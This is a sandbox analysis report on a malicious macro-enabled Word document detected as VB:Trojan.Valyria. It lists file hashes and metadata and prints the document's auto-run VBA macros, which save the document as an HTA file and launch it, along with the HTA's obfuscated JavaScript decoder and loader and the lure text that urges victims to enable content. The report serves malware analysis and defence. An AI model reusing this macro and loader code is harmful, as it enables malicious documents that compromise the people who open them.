Try VMRay Platform
Malicious
Classifications

-

Threat Names

Mal/Generic-S Mal/HTMLGen-A VB:Trojan.Valyria.5645

Dynamic Analysis Report

Created on 2021-11-12T21:19:00

instruct_11.21.doc.vir.doc

Word Document
...

Remarks

(0x0200004A): 192 dumps were skipped because they exceeded the maximum dump size of 16 MB. The largest one was 19 MB.

Filters:
File Name Category Type Verdict Actions
C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc Sample File Word Document
malicious
...
»
MIME Type application/vnd.ms-word.document.macroEnabled.12
File Size 34.00 KB
MD5 a9490d94cf547e27dcc0d52dc72e74e7 Copy to Clipboard
SHA1 a00e440eb13f84c8b8faba5b81a7d85fce2a4074 Copy to Clipboard
SHA256 ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394 Copy to Clipboard
SSDeep 384:xS6JqYxSJTvfpHhx/gFj0EEYpcVhE1ltmTV/YZO4NSCWl822TnUCSdQQUfwliiid:ZJqY0phb4a02VWnZdw9822zAEhXd Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
malicious
AV Matches (2)
»
Threat Name Verdict
VB:Trojan.Valyria.5645
malicious
VB:Trojan.Valyria.5645
malicious
Office Information
»
Keywords ath.txeNwoPwop\cilbup\sresu\:c
Creator ozdgjmh
Last Modified By Пользователь Windows
Revision 2
Create Time 2021-11-10 09:34:00+00:00
Modify Time 2021-11-10 09:34:00+00:00
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security NONE
Page Count 1
Line Count 42
Paragraph Count 1
Word Count 116
Character Count 9917
Chars With Spaces 10032
ScaleCrop False
SharedDoc False
VBA Macros (2)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function keywords()
With ActiveDocument
girlKarolGirl = .BuiltInDocumentProperties("keywords").Value
End With
keywords = StrReverse(girlKarolGirl)
ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:=dowKarolYou, Replace:=wdReplaceAll
End Function
Public Function s(dowGirlLoad)
Set dowYouKarol = CreateObject("wscript.shell")
dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
End Function
Sub document_open()
main.karoline ("")
End Sub
Macro #2: main
» 
Attribute VB_Name = "main"
Public Sub karoline(likeTubeLike)
doorLikeDow = ThisDocument.keywords
With ActiveDocument
.SaveAs2 FileName:=doorLikeDow, FileFormat:=2
End With
ThisDocument.s doorLikeDow
End Sub
Document Content Snippet
» 
<$1h$1t$1m$1l$1>$1<$1b$1o$1d$1y$1>$1<$1d$1i$1v$1 $1i$1d$1=$1'$1y$1o$1u$1G$1i$1r$1l$1Y$1o$1u$1'$1 $1s$1t$1y$1l$1e$1=$1'$1f$1o$1n$1t$1-$1c$1o$1l$1o$1r$1:$1 $1#$10$10$10$1'$1>$1l$1a$1v$1e$1<$1/$1d$1i$1v$1>$1<$1d$1i$1v$1 $1i$1d$1=$1'$1k$1a$1r$1o$1l$1L$1i$1k$1e$1D$1o$1w$1'$1 $1s$1t$1y$1l$1e$1=$1'$1f$1o$1n$1t$1-$1c$1o$1l$1o$1r$1:$1 $1#$10$10$10$1'$1>$12$1F$1m$1c$1g$1c$1W$1a$1y$1x$1G$1T$1p$1t$1W$1Z$1E$19$12$1b$1y$1B$1S$1P$1g$14$1W$1Z$13$1B$1S$1Q$1j$1R$1X$1a$12$1V$1G$1W$1P$1J$1m$1a$1l$1N$1G$1d$1o$1I$1S$1b$1z$1h$1X$1b$1s$1J$1j$1L$14$11$1G$1b$1o$1R$1H$1d$1w$1J$1S$1K$17$1c$1W$1a$1y$1x$1G$1T$1p$1t$1W$1Z$1E$19$12$1b$1y$15$1y$1b$1w$1V$1m$1b$1o$1I$1y$1R$1F$1R$1l$1I$1s$1A$1i$1I$1o$1R$1H$1d$1w$1p$1z$1L$1v$1M$1H$1a$1v$1V$1H$1b$1k$1V$1m$1c$1l$1x$1G$1b$1p$19$1G$1d$10$1R$1m$1L$1j$19$1W$1b$1v$1I$12$1b$1v$1x$12$1a$1v$1E$1F$1b$1h$1p$10$1a$14$1M$1k$1N$12$1l$1V$1c$1J$1l$1X$1R$13$1J$1G$1Z$15$1B$1n$1Q$1I$1Z$13$1M$15$1p$1k$1U$1v$1c$1n$1c$1X$1d$1l$1T$1D$ ...
Extracted Image Texts (1)
»
Image 1: image1.gif
»
This document created in previous version of Hicrosoft Office Word To view or edit this document. please click “Enable editing” button on the top bar. and then click “Enable content”
vbaProject.bin Embedded File Unknown
malicious
...
»
Parent File C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc
MIME Type application/CDFV2
File Size 15.00 KB
MD5 71fa78284518876e61de2cb2b4433a98 Copy to Clipboard
SHA1 09f85eeb62089e1517b9066919e6004021d12c61 Copy to Clipboard
SHA256 647df13d43101abafb35742e5cdb0ceab3c140ea4c2235168debc16738c5f87d Copy to Clipboard
SSDeep 192:Vdo0U83qTLpy+KN0j3i8ktfvyOvMEb6va:7dCp1KN0j3i8ktMEb6 Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
malicious
Names Mal/Generic-S
AV Matches (1)
»
Threat Name Verdict
VB:Trojan.Valyria.5645
malicious
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat Modified File Stream
clean
...
»
MIME Type application/octet-stream
File Size 128 Bytes
MD5 cc90851958032b8c8bbb7b24ec6271dd Copy to Clipboard
SHA1 e027ad2ea4049374a3b01af2e3626b667dc816bc Copy to Clipboard
SHA256 c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858 Copy to Clipboard
SSDeep 3:Fl: Copy to Clipboard
ImpHash -
image1.gif Embedded File Image
clean
...
»
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\cd5629ca.gif (Dropped File)
Parent File C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc
MIME Type image/gif
File Size 13.99 KB
MD5 76da3e2154587dd3d69a81fcdb0c7364 Copy to Clipboard
SHA1 0f23e27b3a456b22a11d3fbc3132397b0ddc9357 Copy to Clipboard
SHA256 f9299ab3483a8f729b2aca2111b46e9952d4491ac66124fec22c1c789ebc3139 Copy to Clipboard
SSDeep 384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv Copy to Clipboard
ImpHash -
c:\users\public\~wrd0000.tmp Dropped File HTML
clean
...
»
Also Known As c:\users\public\powpownext.hta (Dropped File)
MIME Type text/html
File Size 3.27 KB
MD5 fa2b89027304712fb8366c1f6b4f2827 Copy to Clipboard
SHA1 6f851332c08998d25d839112a5c9d3ca8e57fcc0 Copy to Clipboard
SHA256 6e1338e07405a9b14db254b9769767ea824cf3ac1c8dfecb3513e95135eceaee Copy to Clipboard
SSDeep 96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp Copy to Clipboard
ImpHash -
Extracted JavaScripts (4)
»
JavaScript #1
» 
function likeTubeDoor(loveDowPow){return(new ActiveXObject(loveDowPow));}function loadLoveLove(girlNextPow){return(loadDowDow.getElementById(girlNextPow).innerHTML);}function tubeNextPow(likeLoadNext){return('cha' + likeLoadNext);}function dowYouLike(doorLoadDoor){var girlTubePow = loadLoveLove('karolPowYou');var likeDoorDoor = "";var youPowLoad, tubeGirlTube, girlLoadGirl;var karolKarolLoad, doorLikeKarol, dowDoorLove, nextNextYou;var youDoorKarol = 0;doorLoadDoor = doorLoadDoor.replace(/[^A-Za-z0-9\+\/\=]/g, "");while(youDoorKarol < doorLoadDoor.length){karolKarolLoad = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));doorLikeKarol = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));dowDoorLove = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));nextNextYou = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));youPowLoad = (karolKarolLoad << 2) | (doorLikeKarol >> 4);tubeGirlTube = ((doorLikeKarol & 15) << 4) | (dowDoorLove >> 2);girlLoadGirl = ((dowDoorLove & 3) << 6) | nextNextYou;likeDoorDoor = likeDoorDoor + String.fromCharCode(youPowLoad);if(dowDoorLove != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(tubeGirlTube);}if(nextNextYou != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(girlLoadGirl);}}return(likeDoorDoor);}function karolLoadNext(tubeTubeLove){return tubeTubeLove.split('').reverse().join('');}function loveNextKarol(likeLoadNext){return(karolLoadNext(dowYouLike(karolLoadNext(likeLoadNext))));}function karolNextDoor(likeLoadNext, nextNextLike){return(likeLoadNext.split(nextNextLike));}doorPowLove = window;loadDowDow = document;doorPowLove.moveTo(-10, -10);var tubeNextDow = loadLoveLove('karolLikeDow').split("|||");var tubeNextDoor = loveNextKarol(tubeNextDow[0]);var likeGirlTube = loveNextKarol(tubeNextDow[1]);
JavaScript #2
» 
function tubeYouDow(tubeLoadLove){doorPowLove[karolLoadNext(loadLoveLove('youGirlYou'))](tubeLoadLove);}
JavaScript #3
» 
Call tubeYouDow(tubeNextDoor) : Call tubeYouDow(likeGirlTube)
JavaScript #4
» 
doorPowLove['close']();
c:\users\public\~$wpownext.hta Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 162 Bytes
MD5 f80d2be1edfe197e672e9b7c7b73a067 Copy to Clipboard
SHA1 5f10137b84f50b95bdd438818fd1dbaa6506651c Copy to Clipboard
SHA256 7dca88fac9a1cb53ec518cf3428448daf2dcdf349eddee8ebfb9793fdb99e3e4 Copy to Clipboard
SSDeep 3:fmrc9/XMflUflllXBJaeqvaplsltl:Orc9/8NUF7zqvaLslX Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT Dropped File Unknown
clean
Known to be clean.
...
»
MIME Type application/x-dbt
File Size 47.97 KB
MD5 0392ada071eb68355bed625d8f9695f3 Copy to Clipboard
SHA1 777253141235b6c6ac92e17e297a1482e82252cc Copy to Clipboard
SHA256 b1313dd95eaf63f33f86f72f09e2ecd700d11159a8693210c37470fcb84038f7 Copy to Clipboard
SSDeep 3:Ztt:T Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\YPFIZL51\error[1] Dropped File HTML
clean
Known to be clean.
...
»
MIME Type text/html
File Size 3.17 KB
MD5 16aa7c3bebf9c1b84c9ee07666e3207f Copy to Clipboard
SHA1 bf0afa2f8066eb7ee98216d70a160a6b58ec4aa1 Copy to Clipboard
SHA256 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754 Copy to Clipboard
SSDeep 96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa Copy to Clipboard
ImpHash -
Extracted JavaScripts (1)
»
JavaScript #1
» 
var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";
var L_ErrorNumber_Text = "Error: ";
var L_ContinueScript_Message = "Do you want to debug the current page?";
var L_AffirmativeKeyCodeLowerCase_Number = 121;
var L_AffirmativeKeyCodeUpperCase_Number = 89;
var L_NegativeKeyCodeLowerCase_Number = 110;
var L_NegativeKeyCodeUpperCase_Number = 78;
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\0GQKFXIA\error[1] Dropped File Text
clean
Known to be clean.
...
»
MIME Type text/plain
File Size 1.67 KB
MD5 b9bec45642ff7a2588dc6cb4131ea833 Copy to Clipboard
SHA1 4d150a53276c9b72457ae35320187a3c45f2f021 Copy to Clipboard
SHA256 b0abe318200dcde42e2125df1f0239ae1efa648c742dbf9a5b0d3397b903c21d Copy to Clipboard
SSDeep 48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO Copy to Clipboard
ImpHash -
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\VD7IA8JG\warning[1] Dropped File Image
clean
...
»
MIME Type image/gif
File Size 1.04 KB
MD5 124a9e7b6976f7570134b7034ee28d2b Copy to Clipboard
SHA1 e889bfc2a2e57491016b05db966fc6297a174f55 Copy to Clipboard
SHA256 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9 Copy to Clipboard
SSDeep 12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image